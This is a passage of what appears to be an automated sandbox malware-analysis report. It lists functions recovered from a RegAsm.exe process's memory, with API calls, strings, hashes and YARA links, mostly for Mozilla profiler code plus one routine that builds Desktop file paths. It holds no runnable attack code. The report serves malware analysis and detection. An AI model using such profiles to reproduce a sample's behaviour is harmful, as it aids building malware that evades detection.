                                                                                                                                                                                                                                                                                                  • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2666944752-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c42991278f5d22b7111bed5a6900337b673c3d1f89ab641f572ab3ff63caf7af
                                                                                                                                                                                                                                                                                                  • Instruction ID: cb88dd8be3e2657bfeae855c7db0da3eea8394fbd9c70964a1e30287ac8b5d9d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c42991278f5d22b7111bed5a6900337b673c3d1f89ab641f572ab3ff63caf7af
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5218B742016118FDB25DB68C988A5AB7B5AF8430CF245C2EE55FC3B41EB35E948CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C801640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C801699
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8016CB
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8016D7
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8016DE
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8016E5
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8016EC
                                                                                                                                                                                                                                                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C8016F9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 375572348-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: bdafa357b04b0ef5609c429281db648e405129e18ec2b977cc31ffa4217b32fa
                                                                                                                                                                                                                                                                                                  • Instruction ID: 08251193396ad2e555038b79ebff34df16d7eff4c18c98782c4b74675a6bb6c0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdafa357b04b0ef5609c429281db648e405129e18ec2b977cc31ffa4217b32fa
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0121F3B07402086FEB315A698D89FFE727CEF86718F004928F6059B680E6789D44C7E1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C83F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F619
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C83F598), ref: 6C83F621
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F637
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8,?,?,00000000,?,6C83F598), ref: 6C83F645
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8,?,?,00000000,?,6C83F598), ref: 6C83F663
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C83F62A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                                  • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                                                                  • Opcode ID: fa8a5c2291dcb4557209bad9a18f0503314755c4bfb9736a93a5018ba772c69b
                                                                                                                                                                                                                                                                                                  • Instruction ID: d9272e087cf0b330c5065a70e5be89644a2a9b4ca6c3aca6e4242c849ea964a3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa8a5c2291dcb4557209bad9a18f0503314755c4bfb9736a93a5018ba772c69b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF11C871204124ABCB30AF59C64C9AA7779FB9635CB502875EA0983F01EB71AC25CBF0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C801FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C801FDE
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C801FFD
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C802011
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C802059
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: CoCreateInstance$combase.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 4190559335-2197658831
                                                                                                                                                                                                                                                                                                  • Opcode ID: e4198083c5dfd67900f766bf67deb8484358d22371a86d82bd748b0751a9c62d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6ad6e4f5fd34ae0758164bec4746ba3daab04b1b1d9173cbe12955aaa21fe578
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4198083c5dfd67900f766bf67deb8484358d22371a86d82bd748b0751a9c62d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10113675201214AFEF31CF16CE4CAAA3B79FB96269F004829E90482A40E7749840DBB1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C800EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C82D9F0,00000000), ref: 6C800F1D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C800F3C
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C800F50
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,6C82D9F0,00000000), ref: 6C800F86
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: CoInitializeEx$combase.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 4190559335-2063391169
                                                                                                                                                                                                                                                                                                  • Opcode ID: 638ed77ad0e28f80dd538ffcb54663228f428929b89210ca6f606cd25f92a5af
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1723f0839c3201c1a34c0500496625e7e0499a77d0e7e487f9de42f4e27cdc1f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 638ed77ad0e28f80dd538ffcb54663228f428929b89210ca6f606cd25f92a5af
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08116DB53052509BDB31CF5ACA0CA9E3775AB5A32AF004A39E90592B80E730A485DBB1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00411860 Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(015721F0,?,00000104,00000000,?,00412455,?,015721F0,00000000), ref: 0041186D
                                                                                                                                                                                                                                                                                                  • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,015721F0,00000000,00000000,?,00412455,?,015721F0,00000000), ref: 0041188B
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?,?,00412455,?,015721F0,00000000,?,?,?,?,?,?,?,00000000), ref: 0041189E
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004118B1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %s%s$C:\Users\user\Desktop\$U$A
                                                                                                                                                                                                                                                                                                  • API String ID: 1206339513-3117448059
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4161fd3151e177049a9d61dc72fcd626137b51842f4b693b559576dbc39d5eae
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f4e8af3af13f5a1d2f59571a26ac8238d4788007909f974d53b5e770ab00e95
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4161fd3151e177049a9d61dc72fcd626137b51842f4b693b559576dbc39d5eae
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF062766042187FD7105F5DBC88DA7BBAEEF89764F10512AF91C83311C6319C0086A4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C83F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F559
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83F561
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F577
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83F585
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83F5A3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_resume, xrefs: 6C83F239
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_resume_sampling, xrefs: 6C83F499
                                                                                                                                                                                                                                                                                                  • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C83F56A
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_pause_sampling, xrefs: 6C83F3A8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                                                                                                  • API String ID: 2848912005-2840072211
                                                                                                                                                                                                                                                                                                  • Opcode ID: ceb5bccc64b3fa332d1a52e99e364dbd10eaa112dfab130be28feed15215ed63
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4a519dac2c05e36ec6f071c1d0365addd1bdd823198a45d52f27d675c9cb266c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ceb5bccc64b3fa332d1a52e99e364dbd10eaa112dfab130be28feed15215ed63
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AF090762002209BDB316FA9994C96E7B7EEB962ADF001875FA0983701EB714804C6F1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C83F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F619
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C83F598), ref: 6C83F621
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83F637
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8,?,?,00000000,?,6C83F598), ref: 6C83F645
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8,?,?,00000000,?,6C83F598), ref: 6C83F663
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C83F62A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                                  • API String ID: 2848912005-753366533
                                                                                                                                                                                                                                                                                                  • Opcode ID: f0c00862f11dc522da3acabd9d1b1ec2882e602195e717ce5c28fe5d0b7e061b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 21d3e4ae38e9159b03b2bab3490d1765e6b5a6a64202e6270559d73bf2de1d2e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0c00862f11dc522da3acabd9d1b1ec2882e602195e717ce5c28fe5d0b7e061b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEF09676200120ABDB316B69894C96E777DEB9526DF001475FA0983711EB754C05C6F1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C800E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,6C800DF8), ref: 6C800E82
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C800EA1
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C800EB5
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C800EC5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                                                                                                                                                  • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 391052410-1680159014
                                                                                                                                                                                                                                                                                                  • Opcode ID: 96500e93d1052d8b5cc4d6fb941ab128863f01f3379adae5a816ba6fda2ab491
                                                                                                                                                                                                                                                                                                  • Instruction ID: 02f6eb6607c9aef623291492b85f74a61c6af77be1f9b4a0cf0960e02d861ca7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96500e93d1052d8b5cc4d6fb941ab128863f01f3379adae5a816ba6fda2ab491
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C012875B042E19BDB32CFAACA1CA5A33B6F75739DF100935D90193B40F778A444DAA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8305F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
